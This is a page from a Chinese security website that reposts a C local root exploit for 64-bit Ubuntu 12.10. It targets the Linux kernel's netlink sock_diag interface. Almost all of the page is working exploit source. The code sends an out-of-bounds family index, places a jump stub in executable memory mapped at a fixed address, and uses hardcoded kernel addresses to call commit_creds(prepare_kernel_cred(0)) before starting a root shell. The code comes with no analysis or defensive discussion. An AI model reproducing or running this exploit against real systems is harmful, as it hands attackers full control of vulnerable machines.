首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ubuntu 12.10 64bit Local Root
来源:vfocus.net 作者:Szczesniak 发布时间:2013-03-12  

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
 commit_creds(prepare_kernel_cred(0));
 return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
 int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
 unsigned family;
 struct {
  struct nlmsghdr nlh;
  struct unix_diag_req r;
 } req;
 char buf[8192];

 if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
  printf("Can't create sock diag socket\n");
  return -1;
 }

 memset(&req, 0, sizeof(req));
 req.nlh.nlmsg_len = sizeof(req);
 req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
 req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
 req.nlh.nlmsg_seq = 123456;

 req.r.udiag_states = -1;
 req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

 /* Ubuntu 12.10 x86_64 */
 req.r.sdiag_family = 0x37;
 commit_creds = (_commit_creds) 0xffffffff8107d180;
 prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
  MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

  printf("mmap fault\n");
  exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

 send(fd, &req, sizeof(req), 0);
 if(!getuid())
  system("/bin/sh");
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Media Player 10.0.0.38
·Fedora Ubuntu kernel 3.3-3.8 L
·VLC Player 2.0.x (.mp3) <= Mem
·Honeywell HSC Remote Deployer
·SCADA 3S CoDeSys Gateway Serve
·Microsoft Office PowerPoint 20
·Firebird Relational Database C
·Linux Kernel 'SCTP_GET_ASSOC_S
·ALLMediaServer 0.94 SEH Overfl
·Ruby Gem Fastreader 1.0.8 Comm
·Squid 3.x Denial Of Service
·Ruby Gem Minimagic Command Exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved